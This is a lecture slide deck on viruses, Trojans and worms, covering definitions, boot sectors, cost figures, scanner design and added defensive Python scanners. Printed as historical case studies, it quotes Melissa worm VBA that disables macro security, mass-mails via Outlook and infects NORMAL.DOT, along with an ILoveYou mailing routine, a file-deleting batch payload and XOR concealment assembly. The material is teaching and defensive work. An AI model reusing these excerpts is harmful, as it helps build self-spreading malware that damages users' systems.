
1 Viruses, Trojans, and Worms Prabhaker Mateti

2 Virus Awareness
Mateti, Viruses, Trojans and Worms 2
- Virus Bulletin: http://www.virusbtn.com/
  Technical journal on developments in the field of computer viruses and anti-virus products.
- Virus Map, Calendar, ...: http://home.mcafee.com/VirusInfo/
- PC Viruses In-the-Wild: http://www.wildlist.org/WildList/201004.htm
  To offset the 'numbers games' played by antivirus vendors.
  Virus In the Wild: must be spreading as a result of normal day-to-day operations on and between the computers of unsuspecting users.

3 Journal in Computer Virology
Publisher: http://www.springerlink.com/content/1772-9890/
- Malware detection using assembly and API call sequences. Volume 7, Number 2 / May 2011
- Malware and steganography in hard disk firmware. February 2011
- Managing university internet access: balancing the need for security, privacy and digital evidence. November 2010
Volume 6, 2010, Selected Articles
- A general definition of malware
- Identification of file infecting viruses through detection of self-reference replication
- Analysis of a scanning model of worm propagation
Volume 4, 2008, Selected Articles
- Rootkit modeling and experiments under Linux
- Advances in password cracking
- Discovering and exploiting 802.11 wireless driver vulnerabilities

4 Lies, damned lies and anti-virus statistics?
- It is estimated that PC viruses cost businesses approximately
  $55 billion in damages in 2003
  $30 billion in 2002
  $13 billion in 2001
  www.computerworld.com/securitytopics/security/story/0,10801,89138,00.html
- Source: www.computereconomics.com/
  2001: $13.2 billion
  2000: $17.1 billion
  1999: $12.1 billion
  Nimda: $635 million
  Code Red: $2.62 billion
  SirCam: $1.15 billion
- Code Red: $8.7bn in damage estimated. -- Reuters wire service, Aug 2, 2001

5
- 1988: Less than 10 known viruses
- 1990: New virus found every day
- 1993: 10-30 new viruses per week
- 1999: 45,000 viruses and variants
Source: McAfee

6 [image-only slide; no transcript text]

7 [image-only slide] May 25, 2004. Source: http://www.rav.ro/ravmsstats/

8 Malware
- Hard to define precisely. Popular media additionally distorts.
- “Viruses” has come to mean all malware.
- Academicians still try to distinguish among viruses, Trojans, worms, ... based on propagation of code.
- Benign uses of viruses, Trojans and worms are possible.

9 Viruses
- “Officially,” in the sense of ELF etc., not a program. Not even a separate file.
- Code that will reproduce itself, and...
- Definition from RFC 1135: A virus is a piece of code that inserts itself into a host [program], including operating systems, to propagate. It cannot run independently. It requires that its host program be run to activate it.
- Internet Security Glossary: http://www.rfc-editor.org/rfc/rfc4949.txt

10 Worm
- A worm propagates between systems. It does not “reproduce” or infect.
- Definition from RFC 1135: A worm is a program that can run independently, will consume the resources of its host [machine] from within in order to maintain itself and can propagate a complete working version of itself on to other machines.
- Internet Security Glossary: http://www.rfc-editor.org/rfc/rfc4949.txt

11 Logic Bomb
- A logic bomb executes when specific conditions occur.
- Triggers for logic bombs can include a change in a file, a particular series of keystrokes, or a specific time or date.

12 Trapdoor
- Trapdoors allow access to a system by skipping the usual login routine.
- Overall goal of rootkits: install trapdoors.

13 Macro Virus
- Sometimes considered a worm.
- Requires a host program to process/run it.
- Written in Visual Basic for Applications for Word, Access, Excel, PowerPoint, Outlook, etc. E.g., Melissa.

14 The Original Trojan Horse
- Trojan horses are named after Homer’s Iliad story of Greeks gifting a huge wooden horse to Troy that housed soldiers who emerged in the night and attacked the city.

15 Trojan Horses
- Trojan horses are programs that appear to have one function but actually perform another function.
- Modern-day Trojan horses resemble a program that the user wishes to run -- a game, a spreadsheet, or an editor. While the program appears to be doing what the user wants, it is also doing something else unrelated to its advertised purpose, and without the user's knowledge.

16 Types of Propagation
- Parasitic
  Propagates by being a parasite on other files, attaching itself in some manner that still leaves the original file usable.
  .com and .exe files of MS-DOS
  Macro virus
- Boot sector infectors
  Copy themselves to the bootable portion of the hard (or floppy) disk.
  The virus gains control when the system is booted.

17 Normal boot procedure of a PC
- POST (Power On Self Test)
- BIOS (Basic Input/Output System) discovers bootable devices, reads the boot sector from such a device, and passes control to it.
- Bootable hard disks contain a Master Boot Record (MBR).
  Chunk of code at the beginning of the hard drive.
  Also contains the partition table.
- The MBR code will look for a particular partition that is marked bootable (MSDOS fdisk: active), and then transfer control to the code.

18 Boot sector viruses
- Insert themselves into the boot sector area.
- When the system boots, they can “do their thing,” and then transfer control to the relocated code that they replaced.
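The MBR layout on slide 17 (446 bytes of boot code, a four-entry partition table, the 0x55AA signature, one entry flagged active) and the infector behaviour on slide 18 can both be checked from a raw sector image. The Python below is an added example written for this page, not code from the slides: it parses a 512-byte sector, reports structural problems, and compares the boot-code hash against a known-good baseline so a rewritten boot sector shows up. The sample sectors, their boot-code bytes and the baseline hash are constructed.

```python
import hashlib
import struct

# Classic MBR layout (slide 17): 446 bytes of boot code, a 4 x 16-byte
# partition table, then the 0x55AA boot signature in the last two bytes.
SECTOR_SIZE = 512
TABLE_OFFSET = 446
ENTRY_SIZE = 16
BOOT_SIGNATURE = b"\x55\xaa"
ACTIVE_FLAG = 0x80          # status byte value that MS-DOS fdisk calls "active"


def parse_partition_entry(entry: bytes) -> dict:
    """Decode one 16-byte partition-table entry (little-endian fields)."""
    (status, _start_head, _start_sec_cyl, ptype, _end_head, _end_sec_cyl,
     lba_start, num_sectors) = struct.unpack("<BBHBBHII", entry)
    return {
        "bootable": status == ACTIVE_FLAG,
        "type": ptype,
        "lba_start": lba_start,
        "num_sectors": num_sectors,
    }


def parse_mbr(sector: bytes) -> dict:
    """Split a raw 512-byte sector into boot-code hash, signature check and entries."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    table = sector[TABLE_OFFSET:TABLE_OFFSET + 4 * ENTRY_SIZE]
    entries = [parse_partition_entry(table[i:i + ENTRY_SIZE])
               for i in range(0, 4 * ENTRY_SIZE, ENTRY_SIZE)]
    return {
        "signature_ok": sector[-2:] == BOOT_SIGNATURE,
        "boot_code_sha256": hashlib.sha256(sector[:TABLE_OFFSET]).hexdigest(),
        "partitions": entries,
    }


def check_mbr(sector: bytes, baseline_boot_code_sha256: str = "") -> list:
    """Findings a defender wants: bad signature, wrong number of active
    partitions, or boot code that no longer matches a known-good baseline
    (the change a boot-sector infector from slide 18 makes)."""
    findings = []
    mbr = parse_mbr(sector)
    if not mbr["signature_ok"]:
        findings.append("missing 0x55AA boot signature")
    active = [p for p in mbr["partitions"] if p["bootable"]]
    if len(active) != 1:
        findings.append(f"expected exactly one active partition, found {len(active)}")
    if baseline_boot_code_sha256 and mbr["boot_code_sha256"] != baseline_boot_code_sha256:
        findings.append("boot code differs from baseline (possible boot sector infector)")
    return findings


def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed sample sector: the given (fake) boot code padded to 446 bytes,
    one active type-0x83 partition at LBA 2048, three empty entries, signature."""
    code = boot_code.ljust(TABLE_OFFSET, b"\x00")[:TABLE_OFFSET]
    entry = struct.pack("<BBHBBHII", ACTIVE_FLAG, 0, 0, 0x83, 0, 0, 2048, 204800)
    return code + entry + b"\x00" * (3 * ENTRY_SIZE) + BOOT_SIGNATURE


# All of the following are constructed test data, not real boot code.
CLEAN_MBR = build_sample_mbr(b"\xfa\x33\xc0\x8e\xd0")
BASELINE = parse_mbr(CLEAN_MBR)["boot_code_sha256"]      # hypothetical known-good hash
TAMPERED_MBR = build_sample_mbr(b"\xeb\xfe")             # boot code replaced in place
NO_ACTIVE_MBR = CLEAN_MBR[:TABLE_OFFSET] + b"\x00" + CLEAN_MBR[TABLE_OFFSET + 1:]

if __name__ == "__main__":
    for label, sector in (("clean", CLEAN_MBR), ("tampered", TAMPERED_MBR),
                          ("no-active", NO_ACTIVE_MBR)):
        print(label, check_mbr(sector, BASELINE) or "OK")
```

On a real system the sector would come from the first 512 bytes of the disk device and the baseline hash from a trusted install; the partition table is left out of the hash on purpose, since repartitioning legitimately changes it while the boot code should not change.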

19 Multi-partite Viruses
- Refers to viruses that can use multiple means of infection, such as
  MBR
  Boot sector
  Parasitic

20 Payload
- Refers to what the virus does (besides propagation) once executed.
  Do nothing
  Do cute things
  Malicious damage (such as delete your partition table).
- Some viruses have a particular trigger.
  Date
  Number of successful infections
- Smart viruses use an infrequent trigger so that they have time to ensure they have propagated before the users get alerted.

21 Morris 1988 Internet Worm
- Robert Morris in Nov. 1988 used four methods to gain access to computers on the net. One of them involved a buffer overflow attack on fingerd.
- Invoking finger with the appropriate string, the worm could make the daemon at a remote site have a buffer overflow and execute code that gave the worm access to the remote system.
- Once the worm gained access to a system, it would replicate itself and consume virtually all of the machine’s computing resources.
- Hundreds of machines on the net were paralyzed until security experts figured out how to kill the worm.
- Morris turned himself in, was prosecuted and sentenced to
  3 years probation
  400 hours of community service
  $10,500 fine
- (Incidentally, Morris is now a professor at MIT.)
- http://en.wikipedia.org/wiki/Morris_worm

22 Pikachu Worm 2000
- Accesses Outlook Address Book. Requires Visual Basic 6 runtime. Sends messages with its body attached to everyone in this address book.
- The worm is attached to the message as PIKACHUPOKEMON.EXE.
- Overwrites the AUTOEXEC.BAT file with the following:
    @ECHO OFF
    del C:\WINDOWS\*.*
    del C:\WINDOWS\SYSTEM\*.*

23 Melissa Worm 1999
- CERT® Advisory CA-1999-04. March 26, 1999.
- Infected more than one million personal computers in North America.
- Caused more than $80 million in damage.
- Infects NORMAL.DOT, and will infect all documents thereafter.
- The macro is "Document_Close()" so that any document that is worked on will be infected when it is closed.
- When a document is infected the macro inserted is "Document_Open()" so that the macro runs when the document is opened.
- David L. Smith, 31, of Aberdeen Township, NJ
  Pleads guilty. The state will recommend a sentence of 10 years, which is the maximum sentence provided by law.
  Jailed for 20 months and fined $5,000. May 2, 2002.

24 Melissa Worm
- Disables the macro security features:
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Else
        p$ = "clone"
        CommandBars("Tools").Controls("Macro").Enabled = False
        Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
    End If

25 Melissa Worm
- MAPI stands for “Messaging API”, a way for Windows applications to interface with various e-mail functionalities.
    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
    Set UngaDasOutlook = CreateObject("Outlook.Application")
    Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
- A way to tell if it has already infected the host:
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa ?") <> "... by Kwyjibo" Then

26 Melissa Worm
- Check if the application is Outlook.
- Compose a list of the first 50 email addresses from the address book:
    If UngaDasOutlook = "Outlook" Then
        DasMapiName.Logon "profile", "password"
        For y = 1 To DasMapiName.AddressLists.Count
            Set AddyBook = DasMapiName.AddressLists(y)
            x = 1
            Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
            For oo = 1 To AddyBook.AddressEntries.Count
                Peep = AddyBook.AddressEntries(x)
                BreakUmOffASlice.Recipients.Add Peep
                x = x + 1
                If x > 50 Then oo = AddyBook.AddressEntries.Count
            Next oo

27 Melissa Worm
- Actually send emails:
            BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
            BreakUmOffASlice.Body = "Here is that document you asked for... don't show anyone else ;-)"
            BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
            BreakUmOffASlice.Send
- Wrap up:
            Peep = ""
        Next y
        DasMapiName.Logoff
    End If
    p$ = "clone"
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa ?") = "... by Kwyjibo"
    End If

28 Melissa Worm
    Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
    Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
    NTCL = NTI1.CodeModule.CountOfLines
    ADCL = ADI1.CodeModule.CountOfLines
    BGN = 2
    If ADI1.Name <> "Melissa" Then
        If ADCL > 0 Then _
            ADI1.CodeModule.DeleteLines 1, ADCL
        Set ToInfect = ADI1
        ADI1.Name = "Melissa"
        DoAD = True
    End If
    If NTI1.Name <> "Melissa" Then
        If NTCL > 0 Then _
            NTI1.CodeModule.DeleteLines 1, NTCL
        Set ToInfect = NTI1
        NTI1.Name = "Melissa"
        DoNT = True
    End If
    If DoNT <> True And DoAD <> True Then GoTo CYA

29 ILoveYou worm 2000
- CERT® Advisory CA-2000-04 Love Letter Worm, May 4, 2000.
- An attachment named "LOVE-LETTER-FOR-YOU.TXT.VBS"
- A subject of "ILOVEYOU"
- The body of the message reads "kindly check the attached LOVELETTER coming from me."
- This 328-line program caused (by some estimates) ~$10B in damage.
- How much work and smarts was required?

30 ILoveYou Excerpt
    rem barok -loveletter(vbe)
    rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
    ...
    sub spreadtoemail()
        for ctrlists=1 to mapi.AddressLists.Count
            set a=mapi.AddressLists(ctrlists)
            x=1
            for ctrentries=1 to a.AddressEntries.Count
                malead=a.AddressEntries(x)
                set male=out.CreateItem(0)
                male.Recipients.Add(malead)
                male.Subject = "ILOVEYOU"
                male.Body = "kindly check the attached LOVELETTER coming.."
                male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
                male.Send
                x=x+1
            next
        next
    end sub
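The Melissa excerpts (slides 24-28) and the ILoveYou excerpt above lean on the same handful of observable calls: an auto-run event handler, CreateObject("Outlook.Application"), a MAPI namespace and address-list walk, CreateItem(0) / Attachments.Add / Send, a write to the macro-security registry value, and rewriting the VBA project. The Python below is an added example for this page, not code from the slides: it scores macro source text against those indicators the way a static macro scanner would. The indicator weights, the thresholds and the three sample macros are constructed; note that a legitimate report-mailing macro lands in "review" rather than "suspicious", which is why a scanner scores several indicators together instead of flagging any single API.

```python
import re

# Indicator table, constructed for this example: (label, pattern, weight).
# Every pattern corresponds to a call that appears in the Melissa or ILoveYou
# excerpts on the slides. VBA is case-insensitive, hence re.I.
INDICATORS = [
    ("auto-run event handler",
     re.compile(r"\b(Document_Open|Document_Close|AutoOpen|AutoClose)\b", re.I), 2),
    ("instantiates Outlook",
     re.compile(r'CreateObject\(\s*"Outlook\.Application"\s*\)', re.I), 3),
    ("MAPI namespace / address book walk",
     re.compile(r'GetNameSpace\(\s*"MAPI"\s*\)|\.AddressLists\b|\.AddressEntries\b', re.I), 2),
    ("creates and sends a mail item",
     re.compile(r"\.CreateItem\(\s*0\s*\)|\.Recipients\.Add\b|\.Send\b", re.I), 2),
    ("attaches a document",
     re.compile(r"\.Attachments\.Add\b", re.I), 2),
    ("writes the macro security registry value",
     re.compile(r'PrivateProfileString\([^\n]*"Level"\s*\)\s*=', re.I), 4),
    ("turns off the virus protection option",
     re.compile(r"Options\.VirusProtection\s*=", re.I), 4),
    ("rewrites VBA project code (self-replication)",
     re.compile(r"\.VBProject\.VBComponents\b|\.CodeModule\.(DeleteLines|InsertLines|AddFromString)\b", re.I), 4),
]


def scan_macro(source: str) -> dict:
    """Score macro source text against the indicator table.

    Thresholds are constructed: any single weight-4 indicator or a total of 6
    or more is 'suspicious'; 3-5 is 'review' (legitimate automation also
    creates and sends mail); below 3 is 'benign'.
    """
    hits, score, hard_hit = [], 0, False
    for label, pattern, weight in INDICATORS:
        if pattern.search(source):
            hits.append(label)
            score += weight
            hard_hit = hard_hit or weight >= 4
    if hard_hit or score >= 6:
        verdict = "suspicious"
    elif score >= 3:
        verdict = "review"
    else:
        verdict = "benign"
    return {"hits": hits, "score": score, "verdict": verdict}


# Constructed sample macros (not taken from any real document).
BENIGN_MACRO = r"""
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
    Selection.Font.Size = 12
End Sub
"""

REPORT_MAILER_MACRO = r"""
Sub MailWeeklyReport()
    Set app = CreateObject("Outlook.Application")
    Set msg = app.CreateItem(0)
    msg.Subject = "Weekly report"
    msg.Send
End Sub
"""

# Only the indicator lines from the slides; no recipients, so it mails nothing.
MELISSA_LIKE_MACRO = r"""
Private Sub Document_Open()
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Set o = CreateObject("Outlook.Application")
    Set ns = o.GetNameSpace("MAPI")
    Set m = o.CreateItem(0)
    m.Attachments.Add ActiveDocument.FullName
    m.Send
End Sub
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_MACRO), ("report mailer", REPORT_MAILER_MACRO),
                      ("melissa-like", MELISSA_LIKE_MACRO)):
        print(name, scan_macro(src))
```

The registry write and the VBProject rewrite carry the heaviest weight because ordinary document automation has no reason to touch either; the mail-related calls are weighted lower precisely because the "report mailer" pattern is common in offices, so they only tip the verdict in combination.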

31 Anatomy of a Virus
- Two primary components:
  Propagation mechanism
  Payload
- Propagation: method by which the virus spreads itself.
  Old days: single PC, transferred to other hosts by way of floppy diskettes.
  Nowadays: Internet.

32 Structure of A Virus
    Virus() {
        infectExecutable();
        if (triggered()) { doDamage(); }
        jump to main of infected program;
    }
    void infectExecutable() {
        file = choose an uninfected executable file;
        prepend V to file;
    }
    void doDamage() { ... }
    int triggered() { return (some test ? 1 : 0); }

33 Case Study: MS-DOS .com Virus
- Virus code == V1; V2. Program infected == P1.
- V1, the Replicator. Rewrites program file as: V1; jump to V2; P1; V2.
- V2, the Concealer. Copies P1 over V1.
- Bomb (payload)
- Infecting .EXE files is much more complicated.

34 .com Virus: Conceal via simple XOR encryption
    encrypt_val db ?
    decrypt:
    encrypt:
        mov ah, encrypt_val
        mov cx, part_to_encrypt_end - part_to_encrypt_start
        mov si, part_to_encrypt_start
        mov di, si
    xor_loop:
        lodsb           ; DS:[SI] -> AL
        xor al, ah
        stosb           ; AL -> ES:[DI]
        loop xor_loop
        ret

35 .com Virus Possible Bombs
- System slowdown. Easily handled by trapping an interrupt and causing a delay when it activates.
- File deletion.
- Message display.
- Killing/replacing the partition table or boot sector of the hard drive.

36 The Linux Virus Writing HOWTO
- “Abstract: This document describes how to write parasitic file viruses infecting ELF executables on Linux/i386. Though it contains a lot of source code, no actual virus is included.”
- http://www.google.com/search?hl=en&q=Linux+Virus+Writing+HOWTO+&btnG=Search

37 Make Viruz, On Demand
- Readily available online kits.
- This viruz maker kit is detected as Troj/Agent-GOF.

38 Virus Scanner Design
- Compare pieces of code to a database of known malicious code.
- Just matching byte sequences in the code.
- Identify viruses by their “signatures.”
- Search for these patterns in executable files.
- Watch for changes in files.
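To make the scanner design on this slide concrete (signature bytes, searching files for them, watching files for change), here is an added Python example that is not part of the slides. It also covers the simple XOR concealment of slide 34 from the defender's side: instead of decoding every file under every key, it XORs each short signature with each of the 256 single-byte keys and searches the raw file, so an encrypted copy is found together with its key. The signature names and byte patterns, the in-memory "filesystem", the XOR key and the infected samples are all constructed.

```python
import hashlib
from typing import Dict, List, Tuple

# Constructed signature database. A real scanner holds millions of entries
# (slide 41); these byte patterns are made up and match no real malware.
SIGNATURES: Dict[str, bytes] = {
    "Demo.Dropper.A": b"\xeb\x1e\x90\x90\xb8\x01\x4c\xcd\x21",
    "Demo.Macro.B": b"... by Kwyjibo",       # Melissa's infection marker text from slide 25
}

Hit = Tuple[str, int, int]   # (signature name, offset in file, single-byte XOR key)


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key (the concealment loop on slide 34)."""
    return bytes(b ^ key for b in data)


def scan_bytes(data: bytes) -> List[Hit]:
    """Search data for each signature in plaintext (key 0) and under every other
    single-byte XOR key. Transforming the short signature instead of decoding
    the whole file keeps the cost at 256 x len(signature) per file."""
    hits: List[Hit] = []
    for name, sig in SIGNATURES.items():
        for key in range(256):
            off = data.find(xor_bytes(sig, key))
            if off != -1:
                hits.append((name, off, key))
    return sorted(hits, key=lambda h: (h[1], h[0]))


def fingerprint(files: Dict[str, bytes]) -> Dict[str, str]:
    """Baseline for 'watch for changes in files': SHA-256 per path."""
    return {path: hashlib.sha256(content).hexdigest() for path, content in files.items()}


def changed_files(baseline: Dict[str, str], current: Dict[str, str]) -> List[str]:
    """Paths that are new or whose content hash no longer matches the baseline."""
    return sorted(path for path, digest in current.items() if baseline.get(path) != digest)


def scan_files(files: Dict[str, bytes]) -> Dict[str, List[Hit]]:
    """Run the signature scan over an in-memory file set; only files with hits are returned."""
    report: Dict[str, List[Hit]] = {}
    for path, content in files.items():
        hits = scan_bytes(content)
        if hits:
            report[path] = hits
    return report


# Constructed in-memory "filesystem" before and after infection.
CLEAN_FILES: Dict[str, bytes] = {
    "bin/editor.com": b"\x00" * 16 + b"hello world" + b"\x00" * 16,
    "docs/report.doc": b"plain text document",
}
INFECTED_FILES: Dict[str, bytes] = {
    # dropper signature prepended to the program, concealed with XOR key 0x5A
    "bin/editor.com": xor_bytes(SIGNATURES["Demo.Dropper.A"], 0x5A) + CLEAN_FILES["bin/editor.com"],
    # macro marker written into the document in plaintext
    "docs/report.doc": CLEAN_FILES["docs/report.doc"] + b"\n... by Kwyjibo",
}

if __name__ == "__main__":
    baseline = fingerprint(CLEAN_FILES)
    print("changed:", changed_files(baseline, fingerprint(INFECTED_FILES)))
    for path, hits in scan_files(INFECTED_FILES).items():
        for name, off, key in hits:
            print(f"{path}: {name} at offset {off} (xor key 0x{key:02x})")
```

The change-watch and the signature scan complement each other: a hash mismatch tells you that something was modified even when no signature matches (a new or unknown variant), while the signature hit names what was found. Short signatures raise the false-positive rate, which is the trade-off behind the 0.00157% figure on slide 41.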

39 Virus Scanners Internals [image-only slide]

40 Virus Scanners Internals [image-only slide]

41 Anti-malware Products 2010
- From CARO 2010 presentation slides, http://www.caro2010.org/
- Based on data from about 30 products (2010):
  Installer Size: 69.6 MB
  Size on Disk: 265.5 MB
  Number of Signatures: 3,666,872
  Size of Signatures: 84.4 MB
  Updates per Day: 6
  WildList Detection: (virtually) 100%
  Zoo Detection: 91.59%
  False Positives: 0.00157%

42 Virus Scanners Today
- Only have a chance to work if you update them, say every 3 hours, and your vendor identifies new viruses in 1 hour.
- But... still useful to protect you from old viruses.
- Active area for academic research:
  “Avfs: An On-Access Anti-Virus File System”, Yevgeniy Miretskiy, Abhijith Das, Charles P. Wright, and Erez Zadok, Stony Brook University, 2004; http://www.usenix.org/event/sec04/tech/full_papers/miretskiy/miretskiy_html/
  “Hash-AV: fast virus signature scanning by cache-resident filters”, Ozgun Erdogan and Pei Cao, Stanford University, International Journal of Security and Networks, Vol 2, No 1-2, 2007, pp. 50–59
  “Limitations of Current Anti-Virus Scanning Technologies”, Srinivas Mukkamala, Antonins Sulaiman, P Chavez, AH Sung, New Mexico Tech, USA, in the book “Advances in Enterprise Information Technology Security”, 2007

43 Be Very Afraid...
- ILoveYou
  When really dumb people with no resources write malicious programs, it costs $10B.
- Easy to make ILoveYou much more harmful:
  Instead of just forwarding itself, change a few random bits in random documents.
  Post documents with “interesting” names on a public web site.
- What would happen if smart people with resources wrote a malicious program?

44 It's a Jungle Out There...
- Reasonable approximation: any program you run can do anything to your machine: erase all your files, send incriminating email to all your friends, quietly tamper with one number in a spreadsheet, etc.
- Any document you open or web page you visit is a program.

45 References
1. Vesselin Bontchev, Future Trends in Virus Writing, 1994, IFIP TC-11, www.commandcom.com/virus/trends.html
2. Sandeep Kumar and Gene Spafford, "A Generic Virus Scanner in C++," Proceedings of the 8th Computer Security Applications Conference; IEEE Press, Piscataway, NJ; pp. 210-219, 2-4 Dec 1992.
3. Antivirus Research - Scientific Papers, http://www.research.ibm.com/antivirus/SciPapers.htm
4. Anthony Cheuk Tung Lai, "Comprehensive Blended Malware Threat Dissection: Analyze Fake Anti-Virus Software and PDF Payloads", 2010, http://www.sans.org/reading_room/
5. Bryan Barber, "Cheese Worm: Pros and Cons of a Friendly Worm", 2003, http://www.sans.org/reading_room/

